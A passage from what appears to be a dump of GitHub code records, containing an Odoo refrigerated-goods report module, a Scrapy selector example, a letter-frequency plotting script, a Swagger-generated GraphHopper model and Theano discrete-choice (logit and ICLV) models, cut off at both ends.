self.filterCategory(categoria_refrigerados,line_data)\n \n else:\n categoria_refrigerados.append(line_data)\n \n categoria_refrigerados = sorted(\n categoria_refrigerados, key=lambda k: k['order_category'])\n for sorted_produc in categoria_refrigerados:\n sorted_produc['data'] = sorted(sorted_produc['data'], key=lambda k: k['order_product'])\n \n del line_data\n except Exception as e:\n _logger.debug(e)\n raise ValidationError('Verifique que todos los productos tengas categoria Padre!!')\n\n \n date_order = rec.scheduled_date\n all_date = {\n 'date_order': date_order,\n 'refrigerados': categoria_refrigerados,\n }\n del categoria_refrigerados\n \n return all_date\n\n @api.model\n def _get_report_values(self, docids, data=None):\n try:\n locale.setlocale(locale.LC_TIME, 'es_AR.UTF-8')\n except Exception as e:\n raise ValidationError(e)\n \n total_parent = False\n total_users = []\n\n find_stock_pickig = self.env['stock.picking'].search([\n ('id', 'in', docids)\n ])\n if len(find_stock_pickig) > 1:\n \n total_parent = self._all_products_for_clients(find_stock_pickig)\n\n for rec in find_stock_pickig:\n\n refrigerados = []\n\n if rec.sale_id:\n for line in rec.sale_id:\n refrigerados = []\n main_categ = None\n code = None\n date_order = rec.scheduled_date\n for order_line in line.order_line:\n if order_line.product_id.categ_id.name == 'Todos':\n continue\n if order_line.product_id.categ_id:\n if order_line.product_id.categ_id.parent_id:\n main_categ = order_line.product_id.categ_id.parent_id.name if order_line.product_id.categ_id.parent_id else None\n categ = order_line.product_id.categ_id.name\n order_category = order_line.product_id.categ_id.order_report\n product_name = order_line.product_id.description_pickingout\n quantity_product = order_line.product_uom_qty\n qr = str(line.name) + 'R'\n if 
len(product_name) > 13:\n product_name = product_name[:13]\n if rec.order and rec.rute:\n code = f'{rec.rute}{rec.order}'\n elif rec.order and not rec.rute:\n code = f'{rec.order}'\n elif rec.rute and not rec.order:\n code = f'{rec.rute}'\n line_data = {\n 'categ': categ,\n 'main_categ': main_categ,\n 'url': f'https://chart.googleapis.com/chart?chs=150x150&cht=qr&chl={qr}',\n 'order_category': order_category,\n 'total_products': int(quantity_product),\n 'data': [{\n 'order_product':order_line.product_id.order_report,\n 'product_name': product_name,\n 'quantity_product': int(quantity_product),\n }]\n }\n else:\n raise ValidationError(f'El producto {order_line.product_id.description_pickingout}, no tiene categoria padre, referencia {rec.name}!! ') \n if main_categ == 'Refrigerados':\n if refrigerados:\n refrigerados = self.filterCategory(refrigerados,line_data)\n else:\n refrigerados.append(line_data) \n refrigerados = sorted(refrigerados, key=lambda k: k['order_category'])\n for sorted_produc in refrigerados:\n sorted_produc['data'] = sorted(sorted_produc['data'], key=lambda k: k['order_product'])\n \n line_data = None\n\n street = line.partner_id.street if line.partner_id.street is not False else ''\n city = line.partner_id.city if line.partner_id.city is not False else ''\n date_order = rec.scheduled_date\n ruta_name = rec.rute if rec.rute else ''\n order_name = rec.order if rec.order != 0 else ''\n ruta = f'{ruta_name}{order_name}'\n stock_name_count = len(rec.origin)\n stock_name_count = stock_name_count - 3 \n stock_name= rec.origin[:stock_name_count]\n code_name = rec.origin[stock_name_count:] + \"R\"\n categoria = main_categ[:-1]\n categoria = 'REFRIGERADO'\n \n \n date = {\n 'categoria':categoria,\n 'date_order': date_order,\n 'cliente': line.partner_id.name,\n 'stock_name':stock_name,\n 'stock_name_cort':code_name,\n 'nombre_fant': line.partner_id.ref,\n 'dir': '%s %s' % (street, city),\n 'subtotal': line.amount_untaxed,\n 'total': line.amount_total,\n 'deuda': line.get_deuda_total(line.partner_id),\n 'refrigerados': refrigerados,\n 'code': code,\n 'qr_prueba': f'https://chart.googleapis.com/chart?chs=150x150&cht=qr&chl={qr}',\n 'ruta':ruta,\n }\n\n total_users.append(date)\n rec.refrigerated_roadmap = True \n \n list_so = {\n 'total_users': total_users,\n 'total_parent': total_parent,\n }\n _logger.debug('lleeegaaa')\n _logger.debug(list_so)\n docargs = {\n 'doc_ids': docids,\n 'doc_model': 'stock.picking',\n 'docs': list_so,\n }\n del list_so\n del refrigerados\n\n return docargs\n\n def filterCategory(self, categ, categ_new):\n\n exist = categ_new['categ'] in [line['categ'] for line in categ]\n\n if exist == False:\n categ.append(categ_new)\n else:\n data_position = next((index for (index, d) in enumerate(categ) if d[\"categ\"] == categ_new['categ']), None)\n data_position_product = next((index for (index, d) in enumerate(categ[data_position]['data']) if d[\"product_name\"] == categ_new['data'][0]['product_name']), None)\n if data_position_product != None:\n categ[data_position]['total_products'] += categ_new['total_products']\n categ[data_position]['data'][data_position_product]['quantity_product'] += categ_new['data'][0]['quantity_product']\n else:\n categ[data_position]['total_products'] += categ_new['total_products']\n categ[data_position]['data'].append(categ_new['data'][0])\n\n return categ\n \n 
","repo_name":"Paulamoser/TiendaVeggieV14","sub_path":"veggie/models/refrigerated.py","file_name":"refrigerated.py","file_ext":"py","file_size_in_byte":10756,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"71049049149","text":"# -*- coding: utf-8 -*-\nfrom scrapy.selector import Selector\nfrom scrapy.http import HtmlResponse\n\n\nclass SelectorSpider(scrapy.Spider):\n name = 'selector_spider'\n allowed_domains = ['example.com']\n start_urls = ['https://doc.scrapy.org/en/latest/_static/selectors-sample1.html']\n\n def parse(self, response):\n #body = '<html><body><span>good</span></body></html>'\n #Selector(text = body).xpath('//span/text()').extract()\n\n #response = HtmlResponse(url='http://example.com', body=body)\n #Selector(response=response).xpath('//span/text()').extract()\n\n #response.selector.xpath('//span/text()').extract()\n\n # <html>\n # <head>\n # <base href='http://example.com/' />\n # <title>Example website\n # \n # \n # \n # \n # \n response.xpath('//title/text()') #response.css('title:text')\n response.css('img').xpath('@src').extract()\n response.xpath('//title/text()').extract()\n response.xpath('//div[@id=\"images\"]/a/text()').extract_first()\n response.xpath('//div[@id=\"not_exist\"]/a/text()').extract_first() #return None\n response.xpath('//div[@id=\"not-exist\"]/text()').extract_first(default='not-found') # return 'not-found'\n response.xpath('//base/@href').extract() #response.css('base::attr(href)').extract()\n response.xpath('a[contains(@href, \"image\")]/@href').extract()\n response.css('a[href*=image]::attr(href)').extract()\n response.xpath('//a[contains(@href, \"image\")]/img/@src')\n response.css('a[href*=image] img::attr(src)').extract()\n response.xpath('//a[contains(@href, \"image\")]/text()').re('Name:\\s*(.*)') #used to extract image names\n response.xpath('//div[@id=$val]/a/text()', val='images').extract_first()\n response.xpath('//div[count(a)=$cnt]/@id', cnt=5).extract_first()\n response.xpath('//li[re:test(@class, \"item-\\d$\")]//@href').extract()\n\n sel = Selector(text='Click here to go to the Next Page')\n sel.xpath('//a[1]').extract()\n sel.xpath('//a[contains(.//text(), \"Next Page\")]').extract()\n pass\n","repo_name":"xxg2/pythonl","sub_path":"scrapy/totorial/totorial/spiders/selector_spider.py","file_name":"selector_spider.py","file_ext":"py","file_size_in_byte":2810,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"38895238685","text":"#length of English alphabet is equal to 26\r\nfrom collections import OrderedDict\r\nfrom matplotlib import pyplot as plt\r\n#matplotlib.pyplot ile bar plot yapıldı.\r\n#v5 debugging yapılacak\r\n#v6 görsel sadelik için düzenleme yapılacak\r\nclass HarfAnalizMuhendisi():\r\n harfSozluguKucuk_count = {'a': 0, 'b': 0, 'c': 0, 'd': 0,\r\n 'e': 0, 'f': 0, 'g': 0, 'h': 0,\r\n 'i': 0, 'j': 0, 'k': 0, 'l': 0,\r\n 'm': 0, 'n': 0, 'o': 0, 'p': 0, 'q': 0,\r\n 'r': 0, 's': 0,\r\n 't': 0, 'u': 0, 'v': 0,\r\n 'w': 0, 'x': 0, 'y': 0, 'z': 0}\r\n harfSozluguKucuk_count = OrderedDict(harfSozluguKucuk_count)\r\n harfSozluguBuyuk_count = {'A': 0, 'B': 0, 'C': 0, 'D': 0,\r\n 'E': 0, 'F': 0, 'G': 0, 'H': 0, 'I': 0, 'J': 0, 'K': 0,\r\n 'L': 0, 'M': 0, 'N': 0, 'O': 0,\r\n 'P': 0, 'Q': 0, 'R': 0, 'S': 0, 'T': 0, 'U': 0, 'V': 0,\r\n 'W': 0, 'X': 0, 'Y': 0, \"Z\": 0}\r\n harfSozluguBuyuk_count = OrderedDict(harfSozluguBuyuk_count)\r\n kucukHarfler = list(harfSozluguKucuk_count.keys())\r\n buyukHarfler = 
list(harfSozluguBuyuk_count.keys())\r\n def __init__(self,string):\r\n self.string=string #analiz gerçekleştirilecek string\r\n def gercekle_kucukHarfAnalizi(self):\r\n for k in self.kucukHarfler:\r\n self.harfSozluguKucuk_count[k] = self.string.count(k)\r\n def gercekle_buyukHarfAnalizi(self):\r\n for k in self.buyukHarfler:\r\n self.harfSozluguBuyuk_count[k] =self.string.count(k)\r\n def gercekle_butunHarfAnalizi(self):\r\n for k in self.kucukHarfler:\r\n self.harfSozluguKucuk_count[k] = self.string.count(k)\r\n for l in self.buyukHarfler:\r\n self.harfSozluguBuyuk_count[l] = self.string.count(l)\r\n def gosterBuyukHarfAnalizi(self):\r\n for key, value in self.harfSozluguBuyuk_count.items():\r\n print(key, \"-->\", value)\r\n def gosterKucukHarfAnalizi(self):\r\n for key, value in self.harfSozluguKucuk_count.items():\r\n print(key, \"-->\", value)\r\n def gosterString(self):\r\n print(self.string)\r\n def gosterGrafik_kucukHarf(self):\r\n fig = plt.figure()\r\n ax = fig.add_axes([0, 0, 1, 1])\r\n values = self.harfSozluguKucuk_count.values()\r\n ax.bar(self.kucukHarfler,values)\r\n plt.show()\r\n def gosterGrafik_buyukHarf(self):\r\n fig = plt.figure()\r\n ax = fig.add_axes([0, 0, 1, 1])\r\n values = self.harfSozluguBuyuk_count.values()\r\n ax.bar(self.buyukHarfler, values)\r\n plt.show()\r\n def __str__(self):\r\n return \"Constructorda girilen stringe harf analizi yapan ve plot ile ifade eden bir Sınıf\" \\\r\n \"tan türetilen obje\"\r\nif __name__ == '__main__':\r\n # 1=kucukharf analizi 2=buyukharf analizi\r\n # 3=butunHarf analizi\r\n # 4=goster kucukharf analizi 5=buyukharfAnalizi\r\n # 6=goster String\r\n # 7=cıkıs\r\n # 8=plot kucuk harf , 9=plot buyuk harf\r\n CreatorOfPython = HarfAnalizMuhendisi(\"If you're talking about Java in particular, Python \" \\\r\n \"is about the best fit you can get amongst all the other languages. 
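# --- Editor's sketch: the per-letter str.count() loops above rescan the whole
# string 26 times per case; collections.Counter tallies everything in a single
# pass and gives identical counts (standalone example, not tied to the class).
import string
from collections import Counter

def letter_frequencies(text):
    counts = Counter(ch for ch in text if ch in string.ascii_letters)
    lower = {c: counts.get(c, 0) for c in string.ascii_lowercase}
    upper = {c: counts.get(c, 0) for c in string.ascii_uppercase}
    return lower, upper

lower, upper = letter_frequencies("Python is about the best fit")
assert lower['t'] == "Python is about the best fit".count('t')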
\" \\\r\n \"Yet the funny thing is, from a language point of view, JavaScript has a lot in c\" \\\r\n \"ommon with Python, but it is sort of a restricted subset\")\r\n while(True):\r\n print(\"0=Class hakkında bilgi...\\n\"\r\n \"1=kucukharf analizi 2=buyukharf analizi\\n\"\\\r\n \"3=butunHarf analizi\\n\"\\\r\n \"4=goster kucukharf analizi 5=buyukharfAnalizi\\n\"\\\r\n \"6=goster String\\n\"\\\r\n \"7=cıkıs\\n\"\r\n \"8=kucukHarf bar plot\\n\"\r\n \"9=buyukHarf bar plot\")\r\n selection=int(input())\r\n if selection == 1:\r\n CreatorOfPython.gercekle_kucukHarfAnalizi()\r\n print(\"Kucuk harf analizi tamamlandı...\")\r\n continue\r\n elif selection == 2:\r\n CreatorOfPython.gercekle_buyukHarfAnalizi()\r\n print(\"Buyuk harf analizi tamamlandı...\")\r\n continue\r\n elif selection == 3:\r\n CreatorOfPython.gercekle_butunHarfAnalizi()\r\n print(\"Butun harf analizi tamamlandı...\")\r\n continue\r\n elif selection == 4:\r\n CreatorOfPython.gosterKucukHarfAnalizi()\r\n continue\r\n elif selection == 5:\r\n CreatorOfPython.gosterBuyukHarfAnalizi()\r\n continue\r\n elif selection == 6:\r\n CreatorOfPython.gosterString()\r\n continue\r\n elif selection == 7:\r\n print(\"Programdan çıkılıyor...\")\r\n break\r\n elif selection == 8:\r\n CreatorOfPython.gosterGrafik_kucukHarf()\r\n continue\r\n elif selection == 9:\r\n CreatorOfPython.gosterGrafik_buyukHarf()\r\n continue\r\n elif selection == 0:\r\n print(CreatorOfPython)\r\n continue","repo_name":"dataCalculus/stringAnalysisProject","sub_path":"harfAnalizi_4_pyplot.py","file_name":"harfAnalizi_4_pyplot.py","file_ext":"py","file_size_in_byte":5182,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"17863040715","text":"# coding: utf-8\n\n\"\"\"\n GraphHopper Directions API\n\n You use the GraphHopper Directions API to add route planning, navigation and route optimization to your software. E.g. the Routing API has turn instructions and elevation data and the Route Optimization API solves your logistic problems and supports various constraints like time window and capacity restrictions. Also it is possible to get all distances between all locations with our fast Matrix API. 
# noqa: E501\n\n OpenAPI spec version: 1.0.0\n \n Generated by: https://github.com/swagger-api/swagger-codegen.git\n\"\"\"\n\n\nimport pprint\nimport re # noqa: F401\n\nimport six\n\nfrom swagger_client.models.address import Address # noqa: F401,E501\nfrom swagger_client.models.time_window import TimeWindow # noqa: F401,E501\n\n\nclass Stop(object):\n \"\"\"NOTE: This class is auto generated by the swagger code generator program.\n\n Do not edit the class manually.\n \"\"\"\n\n \"\"\"\n Attributes:\n swagger_types (dict): The key is attribute name\n and the value is attribute type.\n attribute_map (dict): The key is attribute name\n and the value is json key in definition.\n \"\"\"\n swagger_types = {\n 'address': 'Address',\n 'duration': 'int',\n 'preparation_time': 'int',\n 'time_windows': 'list[TimeWindow]'\n }\n\n attribute_map = {\n 'address': 'address',\n 'duration': 'duration',\n 'preparation_time': 'preparation_time',\n 'time_windows': 'time_windows'\n }\n\n def __init__(self, address=None, duration=None, preparation_time=None, time_windows=None): # noqa: E501\n \"\"\"Stop - a model defined in Swagger\"\"\" # noqa: E501\n\n self._address = None\n self._duration = None\n self._preparation_time = None\n self._time_windows = None\n self.discriminator = None\n\n if address is not None:\n self.address = address\n if duration is not None:\n self.duration = duration\n if preparation_time is not None:\n self.preparation_time = preparation_time\n if time_windows is not None:\n self.time_windows = time_windows\n\n @property\n def address(self):\n \"\"\"Gets the address of this Stop. # noqa: E501\n\n\n :return: The address of this Stop. # noqa: E501\n :rtype: Address\n \"\"\"\n return self._address\n\n @address.setter\n def address(self, address):\n \"\"\"Sets the address of this Stop.\n\n\n :param address: The address of this Stop. # noqa: E501\n :type: Address\n \"\"\"\n\n self._address = address\n\n @property\n def duration(self):\n \"\"\"Gets the duration of this Stop. # noqa: E501\n\n duration of stop, i.e. time in seconds the corresponding activity takes # noqa: E501\n\n :return: The duration of this Stop. # noqa: E501\n :rtype: int\n \"\"\"\n return self._duration\n\n @duration.setter\n def duration(self, duration):\n \"\"\"Sets the duration of this Stop.\n\n duration of stop, i.e. time in seconds the corresponding activity takes # noqa: E501\n\n :param duration: The duration of this Stop. # noqa: E501\n :type: int\n \"\"\"\n\n self._duration = duration\n\n @property\n def preparation_time(self):\n \"\"\"Gets the preparation_time of this Stop. # noqa: E501\n\n preparation time of service, e.g. search for a parking space. it only falls due if the location of previous activity differs from this location # noqa: E501\n\n :return: The preparation_time of this Stop. # noqa: E501\n :rtype: int\n \"\"\"\n return self._preparation_time\n\n @preparation_time.setter\n def preparation_time(self, preparation_time):\n \"\"\"Sets the preparation_time of this Stop.\n\n preparation time of service, e.g. search for a parking space. it only falls due if the location of previous activity differs from this location # noqa: E501\n\n :param preparation_time: The preparation_time of this Stop. # noqa: E501\n :type: int\n \"\"\"\n\n self._preparation_time = preparation_time\n\n @property\n def time_windows(self):\n \"\"\"Gets the time_windows of this Stop. # noqa: E501\n\n array of time windows. currently, only a single time window is allowed # noqa: E501\n\n :return: The time_windows of this Stop. 
# noqa: E501\n :rtype: list[TimeWindow]\n \"\"\"\n return self._time_windows\n\n @time_windows.setter\n def time_windows(self, time_windows):\n \"\"\"Sets the time_windows of this Stop.\n\n array of time windows. currently, only a single time window is allowed # noqa: E501\n\n :param time_windows: The time_windows of this Stop. # noqa: E501\n :type: list[TimeWindow]\n \"\"\"\n\n self._time_windows = time_windows\n\n def to_dict(self):\n \"\"\"Returns the model properties as a dict\"\"\"\n result = {}\n\n for attr, _ in six.iteritems(self.swagger_types):\n value = getattr(self, attr)\n if isinstance(value, list):\n result[attr] = list(map(\n lambda x: x.to_dict() if hasattr(x, \"to_dict\") else x,\n value\n ))\n elif hasattr(value, \"to_dict\"):\n result[attr] = value.to_dict()\n elif isinstance(value, dict):\n result[attr] = dict(map(\n lambda item: (item[0], item[1].to_dict())\n if hasattr(item[1], \"to_dict\") else item,\n value.items()\n ))\n else:\n result[attr] = value\n\n return result\n\n def to_str(self):\n \"\"\"Returns the string representation of the model\"\"\"\n return pprint.pformat(self.to_dict())\n\n def __repr__(self):\n \"\"\"For `print` and `pprint`\"\"\"\n return self.to_str()\n\n def __eq__(self, other):\n \"\"\"Returns true if both objects are equal\"\"\"\n if not isinstance(other, Stop):\n return False\n\n return self.__dict__ == other.__dict__\n\n def __ne__(self, other):\n \"\"\"Returns true if both objects are not equal\"\"\"\n return not self == other\n","repo_name":"byung90/graphhopper","sub_path":"python/swagger_client/models/stop.py","file_name":"stop.py","file_ext":"py","file_size_in_byte":6236,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"21546861170","text":"import numpy as np\nimport theano\nimport theano.tensor as T\nfrom theano import shared\n\nfloatX = theano.config.floatX\nnp.random.seed(42)\n\n\ndef softmax(x, av):\n\t# logitistic probability\n\te_x = av * T.exp(x - x.max(axis=-1, keepdims=True))\n\treturn e_x / e_x.sum(axis=-1, keepdims=True)\n\n\nclass Logistic(object):\n\t\"\"\" Simple discrete choice model\n\t\tThis module provides a simple softmax function on both generic\n\t\tand non-generic inputs\n\n\t\tconditional logit: U = B_i * x_im + c_i\n\t\tmultinomial logit: U = B_im * x_m + c_i\n\n\t\"\"\"\n\n\tdef __init__(self, n_out, av,\n\t\t\t\t n_in=[None, None], input=[None, None]):\n\t\t\"\"\"\n\t\tParameters\n\t\t----------\n\t\t:int n_out: size of output vectors (number of alternatives)\n\t\t:tensor av: symbolic tensor referencing to the availability of the\n\t\t\t\t\talternatives\n\t\t:list[tensor] input: non-generic and generic input variables\n\t\t:list[int] n_in: size of parameters corresponding to non-generic and\n\t\t\t\t\t\t generic inputs.\n\n\t\t\"\"\"\n\t\tself.params = []\n\t\tself.masks = []\n\n\t\tself.c = shared(\n\t\t\tnp.zeros((n_out,), dtype=floatX),\n\t\t\tname='c', borrow=True)\n\n\t\tself.params.extend([self.c])\n\n\t\tself.c_mask = np.ones((n_out,), dtype=np.bool)\n\t\tself.c_mask[-1] = 0\n\n\t\tself.masks.extend([shared(self.c_mask)])\n\n\t\tif n_in[0] is not None:\n\t\t\tself.B = shared(\n\t\t\t\tnp.zeros(np.prod(n_in[0]), dtype=floatX),\n\t\t\t\tname='B', borrow=True)\n\n\t\t\tself.params.extend([self.B])\n\n\t\t\tself.B_mask = np.ones(np.prod(n_in[0]), dtype=np.bool)\n\n\t\t\tself.masks.extend([shared(self.B_mask)])\n\n\t\tif n_in[1] is not None:\n\t\t\tself.D = shared(\n\t\t\t\tnp.zeros(np.prod(n_in[1]), dtype=floatX),\n\t\t\t\tname='D', 
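# --- Editor's sketch (NumPy) of the availability-masked softmax defined just
# above: multiplying exp(v) by a 0/1 availability vector zeroes unavailable
# alternatives before normalising, so their choice probability is exactly 0.
import numpy as np

def masked_softmax(v, av):
    e = av * np.exp(v - v.max(axis=-1, keepdims=True))
    return e / e.sum(axis=-1, keepdims=True)

p = masked_softmax(np.array([1.0, 2.0, 0.5]), np.array([1.0, 0.0, 1.0]))
assert p[1] == 0.0 and abs(p.sum() - 1.0) < 1e-9  # alternative 2 unavailable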
borrow=True)\n\t\t\tself.D_mat = self.D.reshape(n_in[1])\n\n\t\t\tself.params.extend([self.D])\n\n\t\t\tself.D_mask = np.ones(n_in[1], dtype=np.bool)\n\t\t\tself.D_mask[:, -1] = 0\n\n\t\t\tself.masks.extend([shared(self.D_mask.flatten())])\n\n\t\t# utility equation\n\t\tv = (\n\t\t\tT.dot(input[0], self.B)\n\t\t\t+ T.dot(input[1], self.D_mat)\n\t\t\t+ self.c)\n\n\t\t# estimate a logit model given availability conditions\n\t\tself.p_y_given_x = T.clip(softmax(v, av), 1e-8, 1.0)\n\n\t\t# prediction given choices\n\t\tself.y_pred = T.argmax(self.p_y_given_x, axis=-1)\n\n\tdef loglikelihood(self, y):\n\t\t# loglikelihood sum\n\t\treturn T.sum(T.log(self.p_y_given_x)[T.arange(y.shape[0]), y])\n\n\tdef errors(self, y):\n\t\t# returns the number of errors as a percentage of total number of examples\n\t\treturn T.mean(T.neq(self.y_pred, y))\n\n\nclass MixedLogit(object):\n\t\"\"\" Mixed Logit by simulation\n\t\tThis module provides a simple softmax function on both generic\n\t\tand non-generic inputs\n\n\t\tconditional logit: U = B_i * x_im + c_i\n\t\tmultinomial logit: U = B_im * x_m + c_i\n\n\t\"\"\"\n\n\tdef __init__(self, n_out, av,\n\t\t\t n_in=[None, None], input=[None, None],\n\t\t\t\t draws=None):\n\t\t\"\"\"\n\t\tParameters\n\t\t----------\n\t\t:RandomStream draws: RandomStream of normal draws\n\t\t:int n_out: size of output vectors (number of alternatives)\n\t\t:tensor av: symbolic tensor referencing to the availability of the\n\t\t\t\t\talternatives\n\t\t:list[tensor] input: non-generic and generic input variables\n\t\t:list[int] n_in: size of parameters corresponding to non-generic and\n\t\t\t\t\t\tgeneric inputs.\n\n\t\t\"\"\"\n\t\tself.draws = draws\n\t\tself.params = []\n\t\tself.masks = []\n\n\t\tself.c = shared(\n\t\t\tnp.zeros((n_out,), dtype=floatX),\n\t\t\tname='c', borrow=True)\n\n\t\tself.params.extend([self.c])\n\n\t\tself.c_mask = np.ones((n_out,), dtype=np.bool)\n\t\tself.c_mask[-1] = 0\n\n\t\tself.masks.extend([shared(self.c_mask)])\n\n\t\tif n_in[0] is not None:\n\t\t\tself.B = shared(\n\t\t\t\tnp.zeros(np.prod(n_in[0]), dtype=floatX),\n\t\t\t\tname='B', borrow=True)\n\n\t\t\tself.params.extend([self.B])\n\n\t\t\tself.B_mask = np.ones(np.prod(n_in[0]), dtype=np.bool)\n\n\t\t\tself.masks.extend([shared(self.B_mask)])\n\n\t\t\tself.B_s = shared(\n\t\t\t\tnp.zeros(np.prod(n_in[0]), dtype=floatX),\n\t\t\t\tname='B_s', borrow=True)\n\n\t\t\tself.params.extend([self.B_s])\n\n\t\t\tself.B_s_mask = np.ones(np.prod(n_in[0]), dtype=np.bool)\n\n\t\t\tself.masks.extend([shared(self.B_s_mask)])\n\n\t\tif n_in[1] is not None:\n\t\t\tself.D = shared(\n\t\t\t\tnp.zeros(np.prod(n_in[1]), dtype=floatX),\n\t\t\t\tname='D', borrow=True)\n\t\t\tself.D_mat = self.D.reshape(n_in[1])\n\n\t\t\tself.params.extend([self.D])\n\n\t\t\tself.D_mask = np.ones(n_in[1], dtype=np.bool)\n\t\t\tself.D_mask[:, -1] = 0\n\n\t\t\tself.masks.extend([shared(self.D_mask.flatten())])\n\n\t\t# utility equation\n\t\tself.B_RND = self.B + (self.B_s * draws)\n\n\t\tv = (\n\t\t\tT.batched_tensordot(\n\t\t\t\tinput[0], self.B_RND, axes=[[2], [2]]).dimshuffle(2, 0, 1)\n\t\t\t+ T.dot(input[1], self.D_mat)\n\t\t\t+ self.c)\n\n\t\t# estimate a logit model given availability conditions\n\t\tself.p_y_given_x = T.mean(\n\t\t\tT.clip(softmax(v, av), 1e-8, 1.0), axis=0)\n\n\t\t# prediction given choices\n\t\tself.y_pred = T.argmax(self.p_y_given_x, axis=-1)\n\n\tdef loglikelihood(self, y):\n\t\t# loglikelihood sum\n\t\treturn T.sum(T.log(self.p_y_given_x)[T.arange(y.shape[0]), y])\n\n\tdef errors(self, y):\n\t\t# returns the 
number of errors as a percentage of total number of examples\n\t\treturn T.mean(T.neq(self.y_pred, y))\n\n\nclass ICLV(object):\n\t\"\"\" An intergrated choice and latent variable model\n\t\tgeneric observed variables are used as inputs for the\n\t\tlatent variables.\n\n\t\tThe choice model consists of alternative specific\n\t\tvariables and generic latent variables.\n\n\t\tIndicator outputs are binary valued [0,1], and a non-\n\t\tlinear transform of latent variables is performed using\n\t\tthe sigmoid() function\n\n\t\tThe loss function is comprised of the loglikelihood given the\n\t\talternative specific variables and latent variables with\n\t\tthe cross entropy of the indicators given the latent variables\n\n\t\tLatent variable: x_star_h = G_hm * x_m + g_h\n\t\tIndicators: I_p = A_ph * x_star_h + j_p\n\t\t\t\t\tP(I|x_star) = sigmoid(I_p)\n\t\tChoice utility: U = B_i * x_im + D_ih * x_star_h + c_i\n\t\t\t\t\t\tP(y|x,x_star) = softmax(U, av)\n\t\tloss fn: sum(log(P(y|x,x_star))) + sum(log(P(I|x_star))) +\n\t\t\t\t\tsum(cross_entropy(z, P(I|x_star)))\n\n\t\tcross_entropy(z,p): sum(z*log(p) + (1-z)*log(1-p), axis=-1)\n\n\t\"\"\"\n\n\tdef __init__(self, n_out, av,\n\t\t\t\t n_in=[None, None], n_hid=[None, None, None], n_ind=[None],\n\t\t\t\t input=[None, None], output=None):\n\t\t\"\"\"\n\t\tParameters\n\t\t----------\n\t\t:int n_out: size of output vectors (number of alternatives)\n\t\t:tensor av: symbolic tensor referencing to the availability of the\n\t\t\t\t\talternatives\n\t\t:list[tensor] input: non-generic and generic input variables\n\t\t:list[int] n_in: size of parameters corresponding to non-generic and\n\t\t\t\t\t\t generic inputs.\n\n\t\t\"\"\"\n\t\tself.params = []\n\t\tself.masks = []\n\n\t\tself.c_i = shared(\n\t\t\tnp.zeros((n_out,), dtype=floatX), name='c_i', borrow=True)\n\n\t\tself.params.extend([self.c_i]) # Alternative specific constants\n\n\t\tself.c_mask = np.ones((n_out,), dtype=np.bool)\n\t\tself.c_mask[-1] = 0\n\n\t\tself.masks.extend([shared(self.c_mask)])\n\n\t\tself.B = shared(\n\t\t\tnp.zeros(np.prod(n_in[0]), dtype=floatX), name='B', borrow=True)\n\n\t\tself.params.extend([self.B]) # Generic parameters (cost, time, etc.)\n\n\t\tself.B_mask = np.ones(np.prod(n_in[0]), dtype=np.bool)\n\n\t\tself.masks.extend([shared(self.B_mask)])\n\n\t\tself.G_mask = np.ones(np.prod(n_in[1]), dtype=np.bool)\n\t\t#self.G_mask[:, -1] = 0\n\t\t# self.G_mask[[5, 8, 12, 14, 15, 18, 19, 20, 27, 30, 31, 32, 33, 34, 35, 36, 38, 39, 41, 44, 47, 48, 50, 51, 53, 56, 59]] = 0\n\n\t\tself.masks.extend([shared(self.G_mask.flatten())])\n\n\t\tself.G = shared(\n\t\t\tnp.random.uniform(-1., 1., np.prod(n_in[1]))*self.G_mask.flatten(),\n\t\t\tname='G', borrow=True)\n\t\tself.G_mat = self.G.reshape(n_in[1])\n\n\t\tself.params.extend([self.G]) # Latent variable parameters\n\n\t\t# self.c_h = shared(\n\t\t# \tnp.zeros(n_hid[0], dtype=floatX), name='c_h', borrow=True)\n\t\t#\n\t\t# self.params.extend([self.c_h]) # Latent variable constants\n\t\t#\n\t\t# self.c_h_mask = np.ones(n_hid[0], dtype=np.bool)\n\t\t# self.c_h_mask[-1] = 0\n\t\t#\n\t\t# self.masks.extend([shared(self.c_h_mask)])\n\n\t\tself.A = shared(\n\t\t\tnp.zeros(np.prod(n_hid[1]), dtype=floatX), name='A', borrow=True)\n\t\tself.A_mat = self.A.reshape(n_hid[1]) # Indicator variables\n\n\t\tself.params.extend([self.A])\n\n\t\tself.A_mask = np.ones(np.prod(n_hid[1]), dtype=np.bool)\n\t\t# self.A_mask[:, -1] = 0\n\t\tself.A_mask[[0,1,2,3, 4,5,6,7,\n\t\t\t\t\t 16,17,18,19, 20,21,22,23,\n\t\t\t\t\t 24,25,26,27, 32,33,34,35]] = 
0\n\n\t\tself.masks.extend([shared(self.A_mask.flatten())])\n\n\t\t# self.c_z = shared(\n\t\t# \tnp.zeros(n_ind[0], dtype=floatX), name='c_z', borrow=True)\n\t\t#\n\t\t# self.params.extend([self.c_z]) # Indicator constants\n\t\t#\n\t\t# self.c_z_mask = np.ones(n_ind[0], dtype=np.bool)\n\t\t# self.c_z_mask[-1] = 0\n\t\t#\n\t\t# self.masks.extend([shared(self.c_z_mask)])\n\n\t\tself.D = shared(\n\t\t\tnp.zeros(np.prod(n_hid[2]), dtype=floatX), name='D', borrow=True)\n\t\tself.D_mat = self.D.reshape(n_hid[2])\n\n\t\tself.params.extend([self.D]) # Alternative specific params (Latent)\n\n\t\tself.D_mask = np.ones(n_hid[2], dtype=np.bool)\n\t\tself.D_mask[:, -1] = 0\n\n\t\tself.masks.extend([shared(self.D_mask.flatten())])\n\n\t\t# latent variable equation\n\t\tx_h = T.nnet.sigmoid(T.dot(input[1], self.G_mat))\n\t\t# x_h = T.tanh(T.dot(input[1], self.G_mat) + self.c_h)\n\t\t# x_h = T.dot(input[1], self.G_mat) + self.c_h\n\n\t\t# Indicator equation\n\t\tind = T.dot(x_h, self.A_mat)\n\n\t\t# utility equation\n\t\tv = (T.dot(input[0], self.B)\n\t\t\t + T.dot(x_h, self.D_mat)\n\t\t\t + self.c_i)\n\n\t\t# estimate the indicator measurement model\n\t\tself.p_z_given_x_h = T.clip(T.nnet.sigmoid(ind), 1e-8, 1.0 - 1e-8)\n\n\t\t# estimate a logit model given availability conditions\n\t\tself.p_y_given_x = T.clip(softmax(v, av), 1e-8, 1.0)\n\n\t\t# prediction given choices\n\t\tself.y_pred = 